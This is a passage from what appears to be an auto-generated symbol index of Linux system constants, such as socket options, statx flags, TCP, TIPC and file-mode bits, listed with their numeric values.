SOCK_IOC_TYPE (line 3070) | SOCK_IOC_TYPE = 0x89 constant SOCK_PACKET (line 3071) | SOCK_PACKET = 0xa constant SOCK_RAW (line 3072) | SOCK_RAW = 0x3 constant SOCK_RCVBUF_LOCK (line 3073) | SOCK_RCVBUF_LOCK = 0x2 constant SOCK_RDM (line 3074) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 3075) | SOCK_SEQPACKET = 0x5 constant SOCK_SNDBUF_LOCK (line 3076) | SOCK_SNDBUF_LOCK = 0x1 constant SOCK_TXREHASH_DEFAULT (line 3077) | SOCK_TXREHASH_DEFAULT = 0xff constant SOCK_TXREHASH_DISABLED (line 3078) | SOCK_TXREHASH_DISABLED = 0x0 constant SOCK_TXREHASH_ENABLED (line 3079) | SOCK_TXREHASH_ENABLED = 0x1 constant SOL_AAL (line 3080) | SOL_AAL = 0x109 constant SOL_ALG (line 3081) | SOL_ALG = 0x117 constant SOL_ATM (line 3082) | SOL_ATM = 0x108 constant SOL_CAIF (line 3083) | SOL_CAIF = 0x116 constant SOL_CAN_BASE (line 3084) | SOL_CAN_BASE = 0x64 constant SOL_CAN_RAW (line 3085) | SOL_CAN_RAW = 0x65 constant SOL_DCCP (line 3086) | SOL_DCCP = 0x10d constant SOL_DECNET (line 3087) | SOL_DECNET = 0x105 constant SOL_ICMPV6 (line 3088) | SOL_ICMPV6 = 0x3a constant SOL_IP (line 3089) | SOL_IP = 0x0 constant SOL_IPV6 (line 3090) | SOL_IPV6 = 0x29 constant SOL_IRDA (line 3091) | SOL_IRDA = 0x10a constant SOL_IUCV (line 3092) | SOL_IUCV = 0x115 constant SOL_KCM (line 3093) | SOL_KCM = 0x119 constant SOL_LLC (line 3094) | SOL_LLC = 0x10c constant SOL_MCTP (line 3095) | SOL_MCTP = 0x11d constant SOL_MPTCP (line 3096) | SOL_MPTCP = 0x11c constant SOL_NETBEUI (line 3097) | SOL_NETBEUI = 0x10b constant SOL_NETLINK (line 3098) | SOL_NETLINK = 0x10e constant SOL_NFC (line 3099) | SOL_NFC = 0x118 constant SOL_PACKET (line 3100) | SOL_PACKET = 0x107 constant SOL_PNPIPE (line 3101) | SOL_PNPIPE = 0x113 constant SOL_PPPOL2TP (line 3102) | SOL_PPPOL2TP = 0x111 constant SOL_RAW (line 3103) | SOL_RAW = 0xff constant SOL_RDS (line 3104) | SOL_RDS = 0x114 constant SOL_RXRPC (line 3105) | SOL_RXRPC = 0x110 constant SOL_SMC (line 3106) | SOL_SMC = 0x11e constant SOL_TCP (line 3107) | SOL_TCP = 0x6 constant SOL_TIPC (line 3108) | SOL_TIPC = 0x10f constant SOL_TLS (line 3109) | SOL_TLS = 0x11a constant SOL_UDP (line 3110) | SOL_UDP = 0x11 constant SOL_VSOCK (line 3111) | SOL_VSOCK = 0x11f constant SOL_X25 (line 3112) | SOL_X25 = 0x106 constant SOL_XDP (line 3113) | SOL_XDP = 0x11b constant SOMAXCONN (line 3114) | SOMAXCONN = 0x1000 constant SO_ATTACH_FILTER (line 3115) | SO_ATTACH_FILTER = 0x1a constant SO_DEBUG (line 3116) | SO_DEBUG = 0x1 constant SO_DETACH_BPF (line 3117) | SO_DETACH_BPF = 0x1b constant SO_DETACH_FILTER (line 3118) | SO_DETACH_FILTER = 0x1b constant SO_EE_CODE_TXTIME_INVALID_PARAM (line 3119) | SO_EE_CODE_TXTIME_INVALID_PARAM = 0x1 constant SO_EE_CODE_TXTIME_MISSED (line 3120) | SO_EE_CODE_TXTIME_MISSED = 0x2 constant SO_EE_CODE_ZEROCOPY_COPIED (line 3121) | SO_EE_CODE_ZEROCOPY_COPIED = 0x1 constant SO_EE_ORIGIN_ICMP (line 3122) | SO_EE_ORIGIN_ICMP = 0x2 constant SO_EE_ORIGIN_ICMP6 (line 3123) | SO_EE_ORIGIN_ICMP6 = 0x3 constant SO_EE_ORIGIN_LOCAL (line 3124) | SO_EE_ORIGIN_LOCAL = 0x1 constant SO_EE_ORIGIN_NONE (line 3125) | SO_EE_ORIGIN_NONE = 0x0 constant SO_EE_ORIGIN_TIMESTAMPING (line 3126) | SO_EE_ORIGIN_TIMESTAMPING = 0x4 constant SO_EE_ORIGIN_TXSTATUS (line 3127) | SO_EE_ORIGIN_TXSTATUS = 0x4 constant SO_EE_ORIGIN_TXTIME (line 3128) | SO_EE_ORIGIN_TXTIME = 0x6 constant SO_EE_ORIGIN_ZEROCOPY (line 3129) | SO_EE_ORIGIN_ZEROCOPY = 0x5 constant SO_EE_RFC4884_FLAG_INVALID (line 3130) | SO_EE_RFC4884_FLAG_INVALID = 0x1 constant SO_GET_FILTER (line 3131) | SO_GET_FILTER = 0x1a constant SO_NO_CHECK (line 3132) | SO_NO_CHECK = 0xb constant SO_PEERNAME (line 3133) | SO_PEERNAME = 0x1c constant SO_PRIORITY (line 3134) | SO_PRIORITY = 0xc constant SO_TIMESTAMP (line 3135) | SO_TIMESTAMP = 0x1d constant SO_TIMESTAMP_OLD (line 3136) | SO_TIMESTAMP_OLD = 0x1d constant SO_VM_SOCKETS_BUFFER_MAX_SIZE (line 3137) | SO_VM_SOCKETS_BUFFER_MAX_SIZE = 0x2 constant SO_VM_SOCKETS_BUFFER_MIN_SIZE (line 3138) | SO_VM_SOCKETS_BUFFER_MIN_SIZE = 0x1 constant SO_VM_SOCKETS_BUFFER_SIZE (line 3139) | SO_VM_SOCKETS_BUFFER_SIZE = 0x0 constant SO_VM_SOCKETS_CONNECT_TIMEOUT (line 3140) | SO_VM_SOCKETS_CONNECT_TIMEOUT = 0x6 constant SO_VM_SOCKETS_CONNECT_TIMEOUT_NEW (line 3141) | SO_VM_SOCKETS_CONNECT_TIMEOUT_NEW = 0x8 constant SO_VM_SOCKETS_CONNECT_TIMEOUT_OLD (line 3142) | SO_VM_SOCKETS_CONNECT_TIMEOUT_OLD = 0x6 constant SO_VM_SOCKETS_NONBLOCK_TXRX (line 3143) | SO_VM_SOCKETS_NONBLOCK_TXRX = 0x7 constant SO_VM_SOCKETS_PEER_HOST_VM_ID (line 3144) | SO_VM_SOCKETS_PEER_HOST_VM_ID = 0x3 constant SO_VM_SOCKETS_TRUSTED (line 3145) | SO_VM_SOCKETS_TRUSTED = 0x5 constant SPLICE_F_GIFT (line 3146) | SPLICE_F_GIFT = 0x8 constant SPLICE_F_MORE (line 3147) | SPLICE_F_MORE = 0x4 constant SPLICE_F_MOVE (line 3148) | SPLICE_F_MOVE = 0x1 constant SPLICE_F_NONBLOCK (line 3149) | SPLICE_F_NONBLOCK = 0x2 constant SQUASHFS_MAGIC (line 3150) | SQUASHFS_MAGIC = 0x73717368 constant STACK_END_MAGIC (line 3151) | STACK_END_MAGIC = 0x57ac6e9d constant STATX_ALL (line 3152) | STATX_ALL = 0xfff constant STATX_ATIME (line 3153) | STATX_ATIME = 0x20 constant STATX_ATTR_APPEND (line 3154) | STATX_ATTR_APPEND = 0x20 constant STATX_ATTR_AUTOMOUNT (line 3155) | STATX_ATTR_AUTOMOUNT = 0x1000 constant STATX_ATTR_COMPRESSED (line 3156) | STATX_ATTR_COMPRESSED = 0x4 constant STATX_ATTR_DAX (line 3157) | STATX_ATTR_DAX = 0x200000 constant STATX_ATTR_ENCRYPTED (line 3158) | STATX_ATTR_ENCRYPTED = 0x800 constant STATX_ATTR_IMMUTABLE (line 3159) | STATX_ATTR_IMMUTABLE = 0x10 constant STATX_ATTR_MOUNT_ROOT (line 3160) | STATX_ATTR_MOUNT_ROOT = 0x2000 constant STATX_ATTR_NODUMP (line 3161) | STATX_ATTR_NODUMP = 0x40 constant STATX_ATTR_VERITY (line 3162) | STATX_ATTR_VERITY = 0x100000 constant STATX_BASIC_STATS (line 3163) | STATX_BASIC_STATS = 0x7ff constant STATX_BLOCKS (line 3164) | STATX_BLOCKS = 0x400 constant STATX_BTIME (line 3165) | STATX_BTIME = 0x800 constant STATX_CTIME (line 3166) | STATX_CTIME = 0x80 constant STATX_DIOALIGN (line 3167) | STATX_DIOALIGN = 0x2000 constant STATX_GID (line 3168) | STATX_GID = 0x10 constant STATX_INO (line 3169) | STATX_INO = 0x100 constant STATX_MNT_ID (line 3170) | STATX_MNT_ID = 0x1000 constant STATX_MODE (line 3171) | STATX_MODE = 0x2 constant STATX_MTIME (line 3172) | STATX_MTIME = 0x40 constant STATX_NLINK (line 3173) | STATX_NLINK = 0x4 constant STATX_SIZE (line 3174) | STATX_SIZE = 0x200 constant STATX_TYPE (line 3175) | STATX_TYPE = 0x1 constant STATX_UID (line 3176) | STATX_UID = 0x8 constant STATX__RESERVED (line 3177) | STATX__RESERVED = 0x80000000 constant SYNC_FILE_RANGE_WAIT_AFTER (line 3178) | SYNC_FILE_RANGE_WAIT_AFTER = 0x4 constant SYNC_FILE_RANGE_WAIT_BEFORE (line 3179) | SYNC_FILE_RANGE_WAIT_BEFORE = 0x1 constant SYNC_FILE_RANGE_WRITE (line 3180) | SYNC_FILE_RANGE_WRITE = 0x2 constant SYNC_FILE_RANGE_WRITE_AND_WAIT (line 3181) | SYNC_FILE_RANGE_WRITE_AND_WAIT = 0x7 constant SYSFS_MAGIC (line 3182) | SYSFS_MAGIC = 0x62656572 constant S_BLKSIZE (line 3183) | S_BLKSIZE = 0x200 constant S_IEXEC (line 3184) | S_IEXEC = 0x40 constant S_IFBLK (line 3185) | S_IFBLK = 0x6000 constant S_IFCHR (line 3186) | S_IFCHR = 0x2000 constant S_IFDIR (line 3187) | S_IFDIR = 0x4000 constant S_IFIFO (line 3188) | S_IFIFO = 0x1000 constant S_IFLNK (line 3189) | S_IFLNK = 0xa000 constant S_IFMT (line 3190) | S_IFMT = 0xf000 constant S_IFREG (line 3191) | S_IFREG = 0x8000 constant S_IFSOCK (line 3192) | S_IFSOCK = 0xc000 constant S_IREAD (line 3193) | S_IREAD = 0x100 constant S_IRGRP (line 3194) | S_IRGRP = 0x20 constant S_IROTH (line 3195) | S_IROTH = 0x4 constant S_IRUSR (line 3196) | S_IRUSR = 0x100 constant S_IRWXG (line 3197) | S_IRWXG = 0x38 constant S_IRWXO (line 3198) | S_IRWXO = 0x7 constant S_IRWXU (line 3199) | S_IRWXU = 0x1c0 constant S_ISGID (line 3200) | S_ISGID = 0x400 constant S_ISUID (line 3201) | S_ISUID = 0x800 constant S_ISVTX (line 3202) | S_ISVTX = 0x200 constant S_IWGRP (line 3203) | S_IWGRP = 0x10 constant S_IWOTH (line 3204) | S_IWOTH = 0x2 constant S_IWRITE (line 3205) | S_IWRITE = 0x80 constant S_IWUSR (line 3206) | S_IWUSR = 0x80 constant S_IXGRP (line 3207) | S_IXGRP = 0x8 constant S_IXOTH (line 3208) | S_IXOTH = 0x1 constant S_IXUSR (line 3209) | S_IXUSR = 0x40 constant TAB0 (line 3210) | TAB0 = 0x0 constant TASKSTATS_CMD_ATTR_MAX (line 3211) | TASKSTATS_CMD_ATTR_MAX = 0x4 constant TASKSTATS_CMD_MAX (line 3212) | TASKSTATS_CMD_MAX = 0x2 constant TASKSTATS_GENL_NAME (line 3213) | TASKSTATS_GENL_NAME = "TASKSTATS" constant TASKSTATS_GENL_VERSION (line 3214) | TASKSTATS_GENL_VERSION = 0x1 constant TASKSTATS_TYPE_MAX (line 3215) | TASKSTATS_TYPE_MAX = 0x6 constant TASKSTATS_VERSION (line 3216) | TASKSTATS_VERSION = 0xe constant TCIFLUSH (line 3217) | TCIFLUSH = 0x0 constant TCIOFF (line 3218) | TCIOFF = 0x2 constant TCIOFLUSH (line 3219) | TCIOFLUSH = 0x2 constant TCION (line 3220) | TCION = 0x3 constant TCOFLUSH (line 3221) | TCOFLUSH = 0x1 constant TCOOFF (line 3222) | TCOOFF = 0x0 constant TCOON (line 3223) | TCOON = 0x1 constant TCPOPT_EOL (line 3224) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 3225) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 3226) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 3227) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 3228) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_TIMESTAMP (line 3229) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 3230) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 3231) | TCPOPT_WINDOW = 0x3 constant TCP_CC_INFO (line 3232) | TCP_CC_INFO = 0x1a constant TCP_CM_INQ (line 3233) | TCP_CM_INQ = 0x24 constant TCP_CONGESTION (line 3234) | TCP_CONGESTION = 0xd constant TCP_COOKIE_IN_ALWAYS (line 3235) | TCP_COOKIE_IN_ALWAYS = 0x1 constant TCP_COOKIE_MAX (line 3236) | TCP_COOKIE_MAX = 0x10 constant TCP_COOKIE_MIN (line 3237) | TCP_COOKIE_MIN = 0x8 constant TCP_COOKIE_OUT_NEVER (line 3238) | TCP_COOKIE_OUT_NEVER = 0x2 constant TCP_COOKIE_PAIR_SIZE (line 3239) | TCP_COOKIE_PAIR_SIZE = 0x20 constant TCP_COOKIE_TRANSACTIONS (line 3240) | TCP_COOKIE_TRANSACTIONS = 0xf constant TCP_CORK (line 3241) | TCP_CORK = 0x3 constant TCP_DEFER_ACCEPT (line 3242) | TCP_DEFER_ACCEPT = 0x9 constant TCP_FASTOPEN (line 3243) | TCP_FASTOPEN = 0x17 constant TCP_FASTOPEN_CONNECT (line 3244) | TCP_FASTOPEN_CONNECT = 0x1e constant TCP_FASTOPEN_KEY (line 3245) | TCP_FASTOPEN_KEY = 0x21 constant TCP_FASTOPEN_NO_COOKIE (line 3246) | TCP_FASTOPEN_NO_COOKIE = 0x22 constant TCP_INFO (line 3247) | TCP_INFO = 0xb constant TCP_INQ (line 3248) | TCP_INQ = 0x24 constant TCP_KEEPCNT (line 3249) | TCP_KEEPCNT = 0x6 constant TCP_KEEPIDLE (line 3250) | TCP_KEEPIDLE = 0x4 constant TCP_KEEPINTVL (line 3251) | TCP_KEEPINTVL = 0x5 constant TCP_LINGER2 (line 3252) | TCP_LINGER2 = 0x8 constant TCP_MAXSEG (line 3253) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 3254) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 3255) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 3256) | TCP_MD5SIG = 0xe constant TCP_MD5SIG_EXT (line 3257) | TCP_MD5SIG_EXT = 0x20 constant TCP_MD5SIG_FLAG_PREFIX (line 3258) | TCP_MD5SIG_FLAG_PREFIX = 0x1 constant TCP_MD5SIG_MAXKEYLEN (line 3259) | TCP_MD5SIG_MAXKEYLEN = 0x50 constant TCP_MSS (line 3260) | TCP_MSS = 0x200 constant TCP_MSS_DEFAULT (line 3261) | TCP_MSS_DEFAULT = 0x218 constant TCP_MSS_DESIRED (line 3262) | TCP_MSS_DESIRED = 0x4c4 constant TCP_NODELAY (line 3263) | TCP_NODELAY = 0x1 constant TCP_NOTSENT_LOWAT (line 3264) | TCP_NOTSENT_LOWAT = 0x19 constant TCP_QUEUE_SEQ (line 3265) | TCP_QUEUE_SEQ = 0x15 constant TCP_QUICKACK (line 3266) | TCP_QUICKACK = 0xc constant TCP_REPAIR (line 3267) | TCP_REPAIR = 0x13 constant TCP_REPAIR_OFF (line 3268) | TCP_REPAIR_OFF = 0x0 constant TCP_REPAIR_OFF_NO_WP (line 3269) | TCP_REPAIR_OFF_NO_WP = -0x1 constant TCP_REPAIR_ON (line 3270) | TCP_REPAIR_ON = 0x1 constant TCP_REPAIR_OPTIONS (line 3271) | TCP_REPAIR_OPTIONS = 0x16 constant TCP_REPAIR_QUEUE (line 3272) | TCP_REPAIR_QUEUE = 0x14 constant TCP_REPAIR_WINDOW (line 3273) | TCP_REPAIR_WINDOW = 0x1d constant TCP_SAVED_SYN (line 3274) | TCP_SAVED_SYN = 0x1c constant TCP_SAVE_SYN (line 3275) | TCP_SAVE_SYN = 0x1b constant TCP_SYNCNT (line 3276) | TCP_SYNCNT = 0x7 constant TCP_S_DATA_IN (line 3277) | TCP_S_DATA_IN = 0x4 constant TCP_S_DATA_OUT (line 3278) | TCP_S_DATA_OUT = 0x8 constant TCP_THIN_DUPACK (line 3279) | TCP_THIN_DUPACK = 0x11 constant TCP_THIN_LINEAR_TIMEOUTS (line 3280) | TCP_THIN_LINEAR_TIMEOUTS = 0x10 constant TCP_TIMESTAMP (line 3281) | TCP_TIMESTAMP = 0x18 constant TCP_TX_DELAY (line 3282) | TCP_TX_DELAY = 0x25 constant TCP_ULP (line 3283) | TCP_ULP = 0x1f constant TCP_USER_TIMEOUT (line 3284) | TCP_USER_TIMEOUT = 0x12 constant TCP_V4_FLOW (line 3285) | TCP_V4_FLOW = 0x1 constant TCP_V6_FLOW (line 3286) | TCP_V6_FLOW = 0x5 constant TCP_WINDOW_CLAMP (line 3287) | TCP_WINDOW_CLAMP = 0xa constant TCP_ZEROCOPY_RECEIVE (line 3288) | TCP_ZEROCOPY_RECEIVE = 0x23 constant TFD_TIMER_ABSTIME (line 3289) | TFD_TIMER_ABSTIME = 0x1 constant TFD_TIMER_CANCEL_ON_SET (line 3290) | TFD_TIMER_CANCEL_ON_SET = 0x2 constant TIMER_ABSTIME (line 3291) | TIMER_ABSTIME = 0x1 constant TIOCM_DTR (line 3292) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 3293) | TIOCM_LE = 0x1 constant TIOCM_RTS (line 3294) | TIOCM_RTS = 0x4 constant TIOCPKT_DATA (line 3295) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 3296) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 3297) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 3298) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 3299) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 3300) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 3301) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 3302) | TIOCPKT_STOP = 0x4 constant TIPC_ADDR_ID (line 3303) | TIPC_ADDR_ID = 0x3 constant TIPC_ADDR_MCAST (line 3304) | TIPC_ADDR_MCAST = 0x1 constant TIPC_ADDR_NAME (line 3305) | TIPC_ADDR_NAME = 0x2 constant TIPC_ADDR_NAMESEQ (line 3306) | TIPC_ADDR_NAMESEQ = 0x1 constant TIPC_AEAD_ALG_NAME (line 3307) | TIPC_AEAD_ALG_NAME = 0x20 constant TIPC_AEAD_KEYLEN_MAX (line 3308) | TIPC_AEAD_KEYLEN_MAX = 0x24 constant TIPC_AEAD_KEYLEN_MIN (line 3309) | TIPC_AEAD_KEYLEN_MIN = 0x14 constant TIPC_AEAD_KEY_SIZE_MAX (line 3310) | TIPC_AEAD_KEY_SIZE_MAX = 0x48 constant TIPC_CFG_SRV (line 3311) | TIPC_CFG_SRV = 0x0 constant TIPC_CLUSTER_BITS (line 3312) | TIPC_CLUSTER_BITS = 0xc constant TIPC_CLUSTER_MASK (line 3313) | TIPC_CLUSTER_MASK = 0xfff000 constant TIPC_CLUSTER_OFFSET (line 3314) | TIPC_CLUSTER_OFFSET = 0xc constant TIPC_CLUSTER_SIZE (line 3315) | TIPC_CLUSTER_SIZE = 0xfff constant TIPC_CONN_SHUTDOWN (line 3316) | TIPC_CONN_SHUTDOWN = 0x5 constant TIPC_CONN_TIMEOUT (line 3317) | TIPC_CONN_TIMEOUT = 0x82 constant TIPC_CRITICAL_IMPORTANCE (line 3318) | TIPC_CRITICAL_IMPORTANCE = 0x3 constant TIPC_DESTNAME (line 3319) | TIPC_DESTNAME = 0x3 constant TIPC_DEST_DROPPABLE (line 3320) | TIPC_DEST_DROPPABLE = 0x81 constant TIPC_ERRINFO (line 3321) | TIPC_ERRINFO = 0x1 constant TIPC_ERR_NO_NAME (line 3322) | TIPC_ERR_NO_NAME = 0x1 constant TIPC_ERR_NO_NODE (line 3323) | TIPC_ERR_NO_NODE = 0x3 constant TIPC_ERR_NO_PORT (line 3324) | TIPC_ERR_NO_PORT = 0x2 constant TIPC_ERR_OVERLOAD (line 3325) | TIPC_ERR_OVERLOAD = 0x4 constant TIPC_GROUP_JOIN (line 3326) | TIPC_GROUP_JOIN = 0x87 constant TIPC_GROUP_LEAVE (line 3327) | TIPC_GROUP_LEAVE = 0x88 constant TIPC_GROUP_LOOPBACK (line 3328) | TIPC_GROUP_LOOPBACK = 0x1 constant TIPC_GROUP_MEMBER_EVTS (line 3329) | TIPC_GROUP_MEMBER_EVTS = 0x2 constant TIPC_HIGH_IMPORTANCE (line 3330) | TIPC_HIGH_IMPORTANCE = 0x2 constant TIPC_IMPORTANCE (line 3331) | TIPC_IMPORTANCE = 0x7f constant TIPC_LINK_STATE (line 3332) | TIPC_LINK_STATE = 0x2 constant TIPC_LOW_IMPORTANCE (line 3333) | TIPC_LOW_IMPORTANCE = 0x0 constant TIPC_MAX_BEARER_NAME (line 3334) | TIPC_MAX_BEARER_NAME = 0x20 constant TIPC_MAX_IF_NAME (line 3335) | TIPC_MAX_IF_NAME = 0x10 constant TIPC_MAX_LINK_NAME (line 3336) | TIPC_MAX_LINK_NAME = 0x44 constant TIPC_MAX_MEDIA_NAME (line 3337) | TIPC_MAX_MEDIA_NAME = 0x10 constant TIPC_MAX_USER_MSG_SIZE (line 3338) | TIPC_MAX_USER_MSG_SIZE = 0x101d0 constant TIPC_MCAST_BROADCAST (line 3339) | TIPC_MCAST_BROADCAST = 0x85 constant TIPC_MCAST_REPLICAST (line 3340) | TIPC_MCAST_REPLICAST = 0x86 constant TIPC_MEDIUM_IMPORTANCE (line 3341) | TIPC_MEDIUM_IMPORTANCE = 0x1 constant TIPC_NODEID_LEN (line 3342) | TIPC_NODEID_LEN = 0x10 constant TIPC_NODELAY (line 3343) | TIPC_NODELAY = 0x8a constant TIPC_NODE_BITS (line 3344) | TIPC_NODE_BITS = 0xc constant TIPC_NODE_MASK (line 3345) | TIPC_NODE_MASK = 0xfff constant TIPC_NODE_OFFSET (line 3346) | TIPC_NODE_OFFSET = 0x0 constant TIPC_NODE_RECVQ_DEPTH (line 3347) | TIPC_NODE_RECVQ_DEPTH = 0x83 constant TIPC_NODE_SIZE (line 3348) | TIPC_NODE_SIZE = 0xfff constant TIPC_NODE_STATE (line 3349) | TIPC_NODE_STATE = 0x0 constant TIPC_OK (line 3350) | TIPC_OK = 0x0 constant TIPC_PUBLISHED (line 3351) | TIPC_PUBLISHED = 0x1 constant TIPC_REKEYING_NOW (line 3352) | TIPC_REKEYING_NOW = 0xffffffff constant TIPC_RESERVED_TYPES (line 3353) | TIPC_RESERVED_TYPES = 0x40 constant TIPC_RETDATA (line 3354) | TIPC_RETDATA = 0x2 constant TIPC_SERVICE_ADDR (line 3355) | TIPC_SERVICE_ADDR = 0x2 constant TIPC_SERVICE_RANGE (line 3356) | TIPC_SERVICE_RANGE = 0x1 constant TIPC_SOCKET_ADDR (line 3357) | TIPC_SOCKET_ADDR = 0x3 constant TIPC_SOCK_RECVQ_DEPTH (line 3358) | TIPC_SOCK_RECVQ_DEPTH = 0x84 constant TIPC_SOCK_RECVQ_USED (line 3359) | TIPC_SOCK_RECVQ_USED = 0x89 constant TIPC_SRC_DROPPABLE (line 3360) | TIPC_SRC_DROPPABLE = 0x80 constant TIPC_SUBSCR_TIMEOUT (line 3361) | TIPC_SUBSCR_TIMEOUT = 0x3 constant TIPC_SUB_CANCEL (line 3362) | TIPC_SUB_CANCEL = 0x4 constant TIPC_SUB_PORTS (line 3363) | TIPC_SUB_PORTS = 0x1 constant TIPC_SUB_SERVICE (line 3364) | TIPC_SUB_SERVICE = 0x2 constant TIPC_TOP_SRV (line 3365) | TIPC_TOP_SRV = 0x1 constant TIPC_WAIT_FOREVER (line 3366) | TIPC_WAIT_FOREVER = 0xffffffff constant TIPC_WITHDRAWN (line 3367) | TIPC_WITHDRAWN = 0x2 constant TIPC_ZONE_BITS (line 3368) | TIPC_ZONE_BITS = 0x8 constant TIPC_ZONE_CLUSTER_MASK (line 3369) | TIPC_ZONE_CLUSTER_MASK = 0xfffff000 constant TIPC_ZONE_MASK (line 3370) | TIPC_ZONE_MASK = 0xff000000 constant TIPC_ZONE_OFFSET (line 3371) | TIPC_ZONE_OFFSET = 0x18 constant TIPC_ZONE_SCOPE (line 3372) | TIPC_ZONE_SCOPE = 0x1 constant TIPC_ZONE_SIZE (line 3373) | TIPC_ZONE_SIZE = 0xff constant TMPFS_MAGIC (line 3374) | TMPFS_MAGIC = 0x1021994 constant TPACKET_ALIGNMENT (line 3375) | TPACKET_ALIGNMENT = 0x10 constant TPACKET_HDRLEN (line 3376) | TPACKET_HDRLEN = 0x34 constant TP_STATUS_AVAILABLE (line 3377) | TP_STATUS_AVAILABLE = 0x0 constant TP_STATUS_BLK_TMO (line 3378) | TP_STATUS_BLK_TMO = 0x20 constant TP_STATUS_COPY (line 3379) | TP_STATUS_COPY = 0x2 constant TP_STATUS_CSUMNOTREADY (line 3380) | TP_STATUS_CSUMNOTREADY = 0x8 constant TP_STATUS_CSUM_VALID (line 3381) | TP_STATUS_CSUM_VALID = 0x80 constant TP_STATUS_GSO_TCP (line 3382) | TP_STATUS_GSO_TCP = 0x100 constant TP_STATUS_KERNEL (line 3383) | TP_STATUS_KERNEL = 0x0 constant TP_STATUS_LOSING (line 3384) | TP_STATUS_LOSING = 0x4 constant TP_STATUS_SENDING (line 3385) | TP_STATUS_SENDING = 0x2 constant TP_STATUS_SEND_REQUEST (line 3386) | TP_STATUS_SEND_REQUEST = 0x1 constant TP_STATUS_TS_RAW_HARDWARE (line 3387) | TP_STATUS_TS_RAW_HARDWARE = 0x80000000 constant TP_STATUS_TS_SOFTWARE (line 3388) | TP_STATUS_TS_SOFTWARE = 0x20000000 constant TP_STATUS_TS_SYS_HARDWARE (line 3389) | TP_STATUS_TS_SYS_HARDWARE = 0x40000000 constant TP_STATUS_USER (line 3390) | TP_STATUS_USER = 0x1 constant TP_STATUS_VLAN_TPID_VALID (line 3391) | TP_STATUS_VLAN_TPID_VALID = 0x40 constant TP_STATUS_VLAN_VALID (line 3392) | TP_STATUS_VLAN_VALID = 0x10 constant TP_STATUS_WRONG_FORMAT (line 3393) | TP_STATUS_WRONG_FORMAT = 0x4 constant TRACEFS_MAGIC (line 3394) | TRACEFS_MAGIC = 0x74726163 constant TS_COMM_LEN (line 3395) | TS_COMM_LEN = 0x20 constant UDF_SUPER_MAGIC (line 3396) | UDF_SUPER_MAGIC = 0x15013346 constant UDP_CORK (line 3397) | UDP_CORK = 0x1 constant UDP_ENCAP (line 3398) | UDP_ENCAP = 0x64 constant UDP_ENCAP_ESPINUDP (line 3399) | UDP_ENCAP_ESPINUDP = 0x2 constant UDP_ENCAP_ESPINUDP_NON_IKE (line 3400) | UDP_ENCAP_ESPINUDP_NON_IKE = 0x1 constant UDP_ENCAP_GTP0 (line 3401) | UDP_ENCAP_GTP0 = 0x4 constant UDP_ENCAP_GTP1U (line 3402) | UDP_ENCAP_GTP1U = 0x5 constant UDP_ENCAP_L2TPINUDP (line 3403) | UDP_ENCAP_L2TPINUDP = 0x3 constant UDP_GRO (line 3404) | UDP_GRO = 0x68 constant UDP_NO_CHECK6_RX (line 3405) | UDP_NO_CHECK6_RX = 0x66 constant UDP_NO_CHECK6_TX (line 3406) | UDP_NO_CHECK6_TX = 0x65 constant UDP_SEGMENT (line 3407) | UDP_SEGMENT = 0x67 constant UDP_V4_FLOW (line 3408) | UDP_V4_FLOW = 0x2 constant UDP_V6_FLOW (line 3409) | UDP_V6_FLOW = 0x6 constant UMOUNT_NOFOLLOW (line 3410) | UMOUNT_NOFOLLOW = 0x8 constant USBDEVICE_SUPER_MAGIC (line 3411) | USBDEVICE_SUPER_MAGIC = 0x9fa2 constant UTIME_NOW (line 3412) | UTIME_NOW = 0x3fffffff constant UTIME_OMIT (line 3413) | UTIME_OMIT = 0x3ffffffe constant V9FS_MAGIC (line 3414) | V9FS_MAGIC = 0x1021997 constant VERASE (line 3415) | VERASE = 0x2 constant VINTR (line 3416) | VINTR = 0x0 constant VKILL (line 3417) | VKILL = 0x3 constant VLNEXT (line 3418) | VLNEXT = 0xf constant VMADDR_CID_ANY (line 3419) | VMADDR_CID_ANY = 0xffffffff constant VMADDR_CID_HOST (line 3420) | VMADDR_CID_HOST = 0x2 constant VMADDR_CID_HYPERVISOR (line 3421) | VMADDR_CID_HYPERVISOR = 0x0 constant VMADDR_CID_LOCAL (line 3422) | VMADDR_CID_LOCAL = 0x1 constant VMADDR_FLAG_TO_HOST (line 3423) | VMADDR_FLAG_TO_HOST = 0x1 constant VMADDR_PORT_ANY (line 3424) | VMADDR_PORT_ANY = 0xffffffff constant VM_SOCKETS_INVALID_VERSION (line 3425) | VM_SOCKETS_INVALID_VERSION = 0xffffffff constant VQUIT (line 3426) | VQUIT = 0x1 constant VT0 (line 3427) | VT0 = 0x0 constant WAKE_MAGIC (line 3428) | WAKE_MAGIC = 0x20 constant WALL (line 3429) | WALL = 0x40000000 constant WCLONE (line 3430) | WCLONE = 0x80000000 constant WCONTINUED (line 3431) | WCONTINUED = 0x8 constant WDIOC_SETPRETIMEOUT (line 3432) | WDIOC_SETPRETIMEOUT = 0xc0045708 constant WDIOC_SETTIMEOUT (line 3433) | WDIOC_SETTIMEOUT = 0xc0045706 constant WDIOF_ALARMONLY (line 3434) | WDIOF_ALARMONLY = 0x400 constant WDIOF_CARDRESET (line 3435) | WDIOF_CARDRESET = 0x20 constant WDIOF_EXTERN1 (line 3436) | WDIOF_EXTERN1 = 0x4 constant WDIOF_EXTERN2 (line 3437) | 